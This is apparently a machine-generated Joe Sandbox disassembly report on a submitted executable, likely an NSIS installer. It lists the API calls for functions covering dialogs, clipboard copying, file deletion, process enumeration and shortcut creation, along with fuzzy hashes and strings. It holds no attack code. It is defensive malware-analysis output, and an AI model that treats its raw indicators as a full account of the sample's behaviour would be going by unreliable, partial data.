                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                        • CloseHandle.KERNEL32(00000000), ref: 004052C0
                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                        • EmptyClipboard.USER32 ref: 00405411
                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                        • GlobalLock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405427
                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                        • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040545D
                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                        • CloseClipboard.USER32 ref: 0040546E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                        • API String ID: 2110491804-2409696222
                                                        • Opcode ID: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                        • Opcode Fuzzy Hash: a32262366b6956f6ce6576a17cc772d230ae976b6d31d5dbcf7d3a173ee933fc
                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404993
                                                        • GetDlgItem.USER32(?,00000408), ref: 004049A0
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
                                                        • LoadBitmapW.USER32(0000006E), ref: 00404A02
                                                        • SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
                                                        • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
                                                        • DeleteObject.GDI32(?), ref: 00404A79
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
                                                        • ShowWindow.USER32(?,00000005), ref: 00404BCF
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
                                                        • ImageList_Destroy.COMCTL32(?), ref: 00404D9C
                                                        • GlobalFree.KERNEL32(?), ref: 00404DAC
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
                                                        • ShowWindow.USER32(?,00000000), ref: 00404F49
                                                        • GetDlgItem.USER32(?,000003FE), ref: 00404F54
                                                        • ShowWindow.USER32(00000000), ref: 00404F5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $ @$M$N
                                                        • API String ID: 1638840714-3479655940
                                                        • Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                        • Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
                                                        • Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
                                                        • Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F0), ref: 004044F9
                                                        • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404527
                                                        • GetAsyncKeyState.USER32(00000010), ref: 0040452E
                                                        • GetDlgItem.USER32(?,000003F0), ref: 00404543
                                                        • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
                                                        • SetWindowTextW.USER32(?,?), ref: 00404583
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 0040463D
                                                        • lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
                                                        • lstrcatW.KERNEL32(?,00462540), ref: 00404686
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404648
                                                          • Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                          • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                          • Part of subcall function 00406038: CharPrevW.USER32(?,?,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                          • Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000), ref: 00403E8F
                                                        • GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774
                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                        • String ID: 82D$@%F$@rD$A
                                                        • API String ID: 3347642858-1086125096
                                                        • Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                        • Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
                                                        • Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
                                                        • Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59
                                                        APIs
                                                        • DeleteFileW.KERNEL32(?,?,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"), ref: 00406CB8
                                                        • lstrcatW.KERNEL32(0045C918,\*.*), ref: 00406D09
                                                        • lstrcatW.KERNEL32(?,00408838), ref: 00406D29
                                                        • lstrlenW.KERNEL32(?), ref: 00406D2C
                                                        • FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
                                                        • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
                                                        • FindClose.KERNEL32(?), ref: 00406E33
                                                        Strings
                                                        • Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
                                                        • "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe", xrefs: 00406CA4
                                                        • Delete: DeleteFile failed("%s"), xrefs: 00406DFD
                                                        • \*.*, xrefs: 00406D03
                                                        • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
                                                        • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
                                                        • RMDir: RemoveDirectory("%s"), xrefs: 00406E6F
                                                        • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
                                                        • Delete: DeleteFile("%s"), xrefs: 00406DBC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"$Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
                                                        • API String ID: 2035342205-1120617101
                                                        • Opcode ID: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                        • Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
                                                        • Opcode Fuzzy Hash: 929039bad7d15a30b60f6521e1025dcf5eb1071aca27ca1d219e219807f84f48
                                                        • Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                        • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
                                                        • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
                                                        • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
                                                        • lstrcmpA.KERNEL32(name,?), ref: 00406FC7
                                                        • CloseHandle.KERNEL32(?), ref: 004071E6
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                        • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                        • API String ID: 1916479912-1189179171
                                                        • Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                        • Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
                                                        • Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
                                                        • Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64
                                                        APIs
                                                        • GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958
                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
                                                        • lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
                                                        • lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                        • String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 3581403547-784952888
                                                        • Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                        • Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
                                                        • Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
                                                        • Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D
                                                        APIs
                                                        • CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E
                                                        Strings
                                                        • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                        • API String ID: 542301482-1377821865
                                                        • Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                        • Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
                                                        • Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
                                                        • Instruction Fuzzy Hash: 02415E74A00205BFCF04EFA0CC99EAE7B79FF48314B20456AF915EB2E1C679A941CB54
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402E27
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                        • Instruction ID: b91193b5dd17d351e639dca097a4c2443a83fae7855d8014906372cda19badf2
                                                        • Opcode Fuzzy Hash: b5b7ab79f27b5d75a187df3fe9f711fb4388b9579a399927462dc59dec62d440
                                                        • Instruction Fuzzy Hash: 4EE06D32600204AFD700EB749D45ABE736CDF01329F20457BF146F20D1E6B89A41976A
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063BF
                                                        • lstrlenW.KERNEL32(?), ref: 004063CC
                                                        • GetVersionExW.KERNEL32(?), ref: 0040642A
                                                          • Part of subcall function 0040602B: CharUpperW.USER32(?,00406401,?), ref: 00406031
                                                        • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406469
                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00406488
                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00406492
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040649D
                                                        • FreeLibrary.KERNEL32(00000000), ref: 004064D4
                                                        • GlobalFree.KERNEL32(?), ref: 004064DD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                        • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                        • API String ID: 20674999-2124804629
                                                        • Opcode ID: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
                                                        • Instruction ID: f5db07f83b48746be4b9c4f5c588c21b75103c60b5638216cabcef37c42edb4d
                                                        • Opcode Fuzzy Hash: a5c47c37ebb79c3570a5199304d67498c128a01cd5ae19e8b8640fa4b13707a3
